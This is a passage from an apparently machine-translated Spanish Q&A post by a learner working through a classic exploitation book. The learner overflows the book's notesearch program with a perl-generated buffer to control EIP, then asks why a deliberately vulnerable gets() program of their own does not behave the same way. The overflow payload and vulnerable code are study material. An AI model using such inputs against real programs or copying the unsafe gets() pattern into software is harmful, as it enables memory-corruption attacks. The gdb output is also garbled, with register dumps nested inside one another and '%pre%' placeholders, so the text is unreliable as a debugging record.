Código fuente para ambos programas al final de la publicación
Por lo tanto, he trabajado a través de Hacking: The Art Of Exploitation, y hasta ahora todo bien. He logrado controlar EIP en el programa vulnerable notesearch.c.
gdb-peda$ run $(perl -e 'print "a"x112 . "bbbb"')
Starting program: /root/hacking/booksrc/notesearch $(perl -e 'print "a"x112 . "bbbb"')
[DEBUG] found a 5 byte note for user id 0
[DEBUG] found a 7 byte note for user id 0
-------[ end of note data ]-------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers---------------------------------- -]
EAX: 0x0
EBX: 0x0
ECX: 0xbffff300 ('a' <repeats 36 times>, "gdb-peda$ run
Starting program: /root/vulnerable
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbbbb
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x41414141 ('AAAA')
EDX: 0xb7fb687c --> 0x0
ESI: 0x1
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x41414141 ('AAAA')
ESP: 0x4141413d ('=AAA')
EIP: 0x804841d (<main+50>: ret)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048416 <main+43>: mov ecx,DWORD PTR [ebp-0x4]
0x8048419 <main+46>: leave
0x804841a <main+47>: lea esp,[ecx-0x4]
=> 0x804841d <main+50>: ret
0x804841e: xchg ax,ax
0x8048420 <__libc_csu_init>: push ebp
0x8048421 <__libc_csu_init+1>: push edi
0x8048422 <__libc_csu_init+2>: push esi
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x4141413d
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804841d in main ()
gdb-peda$ p/x $eip
$1 = 0x804841d
gdb-peda$
3")
EDX: 0x0
ESI: 0x2
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x0
ESP: 0xbffff300 ('a' <repeats 36 times>, "#include <stdio.h>
int main(){
char *buffer[64];
gets(buffer);
return 0;
}
3")
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code------------------------------------ -]
Invalid $PC address: 0x61616161
[------------------------------------stack------------------------------------ -]
0000| 0xbffff300 ('a' <repeats 36 times>, "gdb-peda$ run $(perl -e 'print "a"x112 . "bbbb"')
Starting program: /root/hacking/booksrc/notesearch $(perl -e 'print "a"x112 . "bbbb"')
[DEBUG] found a 5 byte note for user id 0
[DEBUG] found a 7 byte note for user id 0
-------[ end of note data ]-------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers---------------------------------- -]
EAX: 0x0
EBX: 0x0
ECX: 0xbffff300 ('a' <repeats 36 times>, "gdb-peda$ run
Starting program: /root/vulnerable
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbbbb
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x41414141 ('AAAA')
EDX: 0xb7fb687c --> 0x0
ESI: 0x1
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x41414141 ('AAAA')
ESP: 0x4141413d ('=AAA')
EIP: 0x804841d (<main+50>: ret)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048416 <main+43>: mov ecx,DWORD PTR [ebp-0x4]
0x8048419 <main+46>: leave
0x804841a <main+47>: lea esp,[ecx-0x4]
=> 0x804841d <main+50>: ret
0x804841e: xchg ax,ax
0x8048420 <__libc_csu_init>: push ebp
0x8048421 <__libc_csu_init+1>: push edi
0x8048422 <__libc_csu_init+2>: push esi
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x4141413d
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804841d in main ()
gdb-peda$ p/x $eip
$1 = 0x804841d
gdb-peda$
3")
EDX: 0x0
ESI: 0x2
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x0
ESP: 0xbffff300 ('a' <repeats 36 times>, "#include <stdio.h>
int main(){
char *buffer[64];
gets(buffer);
return 0;
}
3")
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code------------------------------------ -]
Invalid $PC address: 0x61616161
[------------------------------------stack------------------------------------ -]
0000| 0xbffff300 ('a' <repeats 36 times>, "%pre%3")
0004| 0xbffff304 ('a' <repeats 32 times>, "%pre%3")
0008| 0xbffff308 ('a' <repeats 28 times>, "%pre%3")
0012| 0xbffff30c ('a' <repeats 24 times>, "%pre%3")
0016| 0xbffff310 ('a' <repeats 20 times>, "%pre%3")
0020| 0xbffff314 ('a' <repeats 16 times>, "%pre%3")
0024| 0xbffff318 ('a' <repeats 12 times>, "%pre%3")
0028| 0xbffff31c ("aaaaaaaa%pre%3")
[----------------------------------------------------------------------------- -]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
gdb-peda$
3")
0004| 0xbffff304 ('a' <repeats 32 times>, "%pre%3")
0008| 0xbffff308 ('a' <repeats 28 times>, "%pre%3")
0012| 0xbffff30c ('a' <repeats 24 times>, "%pre%3")
0016| 0xbffff310 ('a' <repeats 20 times>, "%pre%3")
0020| 0xbffff314 ('a' <repeats 16 times>, "%pre%3")
0024| 0xbffff318 ('a' <repeats 12 times>, "%pre%3")
0028| 0xbffff31c ("aaaaaaaa%pre%3")
[----------------------------------------------------------------------------- -]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
gdb-peda$
Sin embargo, una vez que escribo mi propio código de buggy muy simple y trato de controlar el EIP, esto sucede
%pre%No obtengo nada, ¿no debería ESP no cambiarse (ya que no está almacenado en la pila) y se sobrescribe el EIP?
Puede encontrar notesearch.c @ enlace A continuación se muestra mi programa "explotable".
No hace falta decir que tengo ASLR deshabilitado y los programas están compilados con las banderas -fno-stack-protector y -zexecstack. Si necesita más información, deje un comentario.
%pre%